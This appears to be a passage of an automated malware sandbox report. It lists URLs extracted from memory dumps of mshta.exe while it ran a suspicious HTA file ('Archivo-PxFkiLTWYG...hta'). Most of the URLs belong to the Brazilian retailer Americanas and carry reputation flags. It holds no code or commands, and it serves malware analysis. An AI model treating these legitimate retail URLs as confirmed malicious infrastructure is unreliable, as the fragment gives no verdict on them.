00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540922781.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                  high
                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngzmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplementometa.largemmshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.americanas.com.br/hotsite/app?chave=dk_hm_dt_2_11_baixeoappmeta.largemeta.large.heightmemshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-thememshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533591245.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557771926.0000000004102000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.550274332.0000000004101000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533630685.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533673256.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533565712.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                          unknown
                                                                                                                                          https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixerhttps://www.amshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.instagram.com/americanasasPmshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climameta.largemshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.americanas.com.br/categoria/informatica-mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                    high
                                                                                                                                                    https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasmshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                      unknown
                                                                                                                                                      https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                        high
                                                                                                                                                        https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosmeta.largemshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                            high
                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.pngmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                              high
                                                                                                                                                              https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                high
                                                                                                                                                                https://images-americanas.b2w.io/catalog-statics/acom/favicon-americanas.icoxmshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pngjmshta.exe, 00000000.00000003.548607709.00000000051F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.00000000051EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://nossaslojas.americanas.com.br/?chave=dk_ft_lojasmshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.americanas.com.br/categoria/celulares.0E)mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-homemshta.exe, 00000000.00000003.538989023.0000000000705000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539136529.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                          high
                                                                                                                                                                          https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555amshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.americanas.com.br/categoria/gift-cardmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484339848.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                              high
                                                                                                                                                                              https://wishlist-v1-americanas.b2w.ioSungamshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&chmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-ledmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.americanas.com.br/categoria/tvmshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hmmshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menumshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngDmshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condicimshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 